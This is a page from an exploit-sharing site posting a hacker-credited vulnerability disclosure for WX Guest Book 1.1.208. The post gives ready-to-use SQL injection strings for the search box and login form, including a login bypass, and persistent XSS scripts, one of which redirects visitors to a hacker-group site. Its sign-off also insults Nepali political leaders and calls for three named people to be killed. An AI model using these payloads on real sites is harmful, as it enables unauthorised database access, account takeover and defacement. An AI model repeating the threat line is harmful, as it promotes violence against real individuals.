0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities
=============================================================== WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities =============================================================== ########################################### # WX Guest Book 1.1.208 Vulns # # By learn3r hacker from nepal # ########################################### Product name: WX Guestbook 1.1.208 Product vendor: www.webilix.com This product suffers from multiple SQLi and persistent XSS vuln. ############## SQL Search Vuln ############### The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server. SQL query: $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC"); The $QUERY is what we submit through search box so injecting this will sql inject the server. The following is the sample sql injection example. Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* ############## SQL login bypass ############### The username and password fields are unsanitized and hence we can bypass the login systems. Username: admin'))/* Password: learn3r [or whatever] Or Username: ')) or 1=1/* Password: learn3r [or whatever] ############## Persistent XSS Vulns ############## In the name field (I suppose as I don't understand arabic), you can inject XSS... <script>alert(String.fromCharCode(97));</script> <script>location.replace("http://www.nepalihackerz.com.np")</script> Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all... FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!! # 0day.today [2024-12-26] #